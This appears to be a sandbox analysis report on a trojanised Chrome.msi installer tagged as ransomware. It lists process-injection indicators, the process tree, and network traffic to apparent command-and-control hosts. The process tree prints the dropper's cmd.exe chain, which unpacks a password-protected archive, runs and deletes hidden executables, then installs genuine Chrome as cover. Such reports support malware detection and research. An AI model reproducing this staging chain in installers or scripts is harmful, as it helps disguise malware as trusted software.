N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\ProgramData\Smart\setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1676 wrote to memory of 2732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1676 wrote to memory of 2732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1676 wrote to memory of 2732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1676 wrote to memory of 2732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1676 wrote to memory of 2732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1676 wrote to memory of 2732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1676 wrote to memory of 2732 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2732 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 2732 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 2732 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 2732 wrote to memory of 3032 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\cmd.exe
PID 3032 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 3032 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 3032 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 3032 wrote to memory of 1536 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\aa.exe
PID 3032 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 3032 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 3032 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 3032 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 1628 wrote to memory of 596 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 3032 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 3012 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 1140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 1140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 1140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 1140 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3032 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Smart\TjNkNpAilaYvt.exe
PID 3032 wrote to memory of 1388 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 3032 wrote to memory of 1388 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 3032 wrote to memory of 1388 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 3032 wrote to memory of 1388 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\Packas\scrok.exe
PID 1056 wrote to memory of 1864 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1056 wrote to memory of 1864 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1056 wrote to memory of 1864 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1056 wrote to memory of 1864 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1056 wrote to memory of 1864 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1056 wrote to memory of 1864 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1056 wrote to memory of 1864 N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe C:\ProgramData\Smart\setup.exe
PID 1388 wrote to memory of 596 N/A C:\ProgramData\Packas\scrok.exe C:\Windows\system32\svchost.exe
PID 3032 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 3032 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 3032 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 3032 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 3032 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 3032 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 3032 wrote to memory of 936 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\setup\setup.exe
PID 936 wrote to memory of 2144 N/A C:\ProgramData\setup\setup.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe
PID 936 wrote to memory of 2144 N/A C:\ProgramData\setup\setup.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe
PID 936 wrote to memory of 2144 N/A C:\ProgramData\setup\setup.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe
PID 936 wrote to memory of 2144 N/A C:\ProgramData\setup\setup.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe
PID 936 wrote to memory of 2144 N/A C:\ProgramData\setup\setup.exe C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Chrome.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "000000000000058C" "00000000000004A0"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 57B2D0FC5CA489275E47D05FF3F585AA

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\SysWOW64\cmd.exe" /c timeout /nobreak /t 7 & C:\ProgramData\setup\aa.exe x C:\ProgramData\setup\ddd. -key 000000 -f -to C:\ProgramData & C:\ProgramData\Packas\scrok.exe & C:\ProgramData\Smart\TjNkNpAilaYvt.exe install & C:\ProgramData\Smart\TjNkNpAilaYvt.exe install & timeout /nobreak /t 2 & C:\ProgramData\Smart\TjNkNpAilaYvt.exe start & C:\ProgramData\Packas\scrok.exe & del C:\ProgramData\Packas\scrok.exe & C:\ProgramData\setup\setup.exe

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 7

C:\ProgramData\setup\aa.exe

C:\ProgramData\setup\aa.exe x C:\ProgramData\setup\ddd. -key 000000 -f -to C:\ProgramData

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe install

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe install

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 2

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe start

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

"C:\ProgramData\Smart\TjNkNpAilaYvt.exe"

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Smart\setup.exe

"C:\ProgramData\Smart\setup.exe"

C:\ProgramData\setup\setup.exe

C:\ProgramData\setup\setup.exe

C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Temp\GUMF133.tmp\GoogleUpdate.exe" /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={9F0C1F44-1C50-396A-483A-08DA4896FF0B}&lang=zh-CN&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zMTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zMTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QUM2RDhEMjEtQTQ2Qy00MTY3LTk0RDctQzNENDQ0MjBEQzQ5fSIgdXNlcmlkPSJ7MzI2QkIxMTYtRkM0Qi00RUE3LThEREYtODFGRTA0OTZFM0JBfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0ie0E5RjQ0OERELUEwRUMtNERBNS04NUQ1LUQ1NTlCNkU0RjgzRX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iNi4xLjc2MDEuMCIgc3A9IlNlcnZpY2UgUGFjayAxIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7NDMwRkQ0RDAtQjcyOS00RjYxLUFBMzQtOTE1MjY0ODE3OTlEfSIgdmVyc2lvbj0iMS4zLjM2LjE1MSIgbmV4dHZlcnNpb249IjEuMy4zNi4zMTIiIGxhbmc9InpoLUNOIiBicmFuZD0iIiBjbGllbnQ9IiIgaWlkPSJ7OUYwQzFGNDQtMUM1MC0zOTZBLTQ4M0EtMDhEQTQ4OTZGRjBCfSI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSIxNzAxIi8-PC9hcHA-PC9yZXF1ZXN0Pg

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={9F0C1F44-1C50-396A-483A-08DA4896FF0B}&lang=zh-CN&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{AC6D8D21-A46C-4167-94D7-C3D44420DC49}"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc

C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\109.0.5414.120_chrome_installer.exe

"C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\109.0.5414.120_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\gui7081.tmp"

C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\gui7081.tmp"

C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=109.0.5414.120 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x1401c1148,0x1401c1158,0x1401c1168

C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe" --system-level --verbose-logging --create-shortcuts=2 --install-level=1

C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{01B7CFE2-711B-4A35-8C7A-D0228AAEC6E9}\CR_C437E.tmp\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=109.0.5414.120 --initial-client-data=0x154,0x158,0x15c,0x128,0x160,0x1401c1148,0x1401c1158,0x1401c1168

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping 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-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-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NzA3IiBzb3VyY2VfdXJsX2luZGV4PSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iMzM1NCIgZG93bmxvYWRfdGltZV9tcz0iMjUyNDEiIGRvd25sb2FkZWQ9IjkzMTIyNjAwIiB0b3RhbD0iOTMxMjI2MDAiIGluc3RhbGxfdGltZV9tcz0iMjgxNTgiLz48L2FwcD48L3JlcXVlc3Q-

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe" -Embedding

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=109.0.5414.120 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6dd6b58,0x7fef6dd6b68,0x7fef6dd6b78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1184 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1620 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2008 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2016 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\109.0.5414.120\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\109.0.5414.120\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3060 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2820 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1304 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3400 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3508 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3724 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3840 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3688 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3816 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3744 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3768 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4040 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4056 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3268 --field-trial-handle=1276,i,247968668552206969,17205619946758336817,131072 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 a17.nbdsnb2.top udp
US 8.8.8.8:53 a17.yydsnb1.top udp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.201.99:443 update.googleapis.com tcp
GB 216.58.201.99:443 update.googleapis.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 216.58.201.99:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 216.58.201.99:80 o.pki.goog tcp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 clients2.google.com udp
US 8.8.8.8:53 accounts.google.com udp
GB 172.217.169.78:443 clients2.google.com tcp
NL 142.250.27.84:443 accounts.google.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.187.206:80 redirector.gvt1.com tcp
US 8.8.8.8:53 r5---sn-aigl6nzk.gvt1.com udp
GB 74.125.175.106:80 r5---sn-aigl6nzk.gvt1.com tcp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
US 8.8.8.8:53 update.googleapis.com udp
GB 216.58.201.99:443 update.googleapis.com tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
GB 216.58.213.10:443 ogads-pa.googleapis.com tcp
N/A 224.0.0.251:5353 udp
GB 216.58.213.10:443 ogads-pa.googleapis.com udp
US 8.8.8.8:53 play.google.com udp
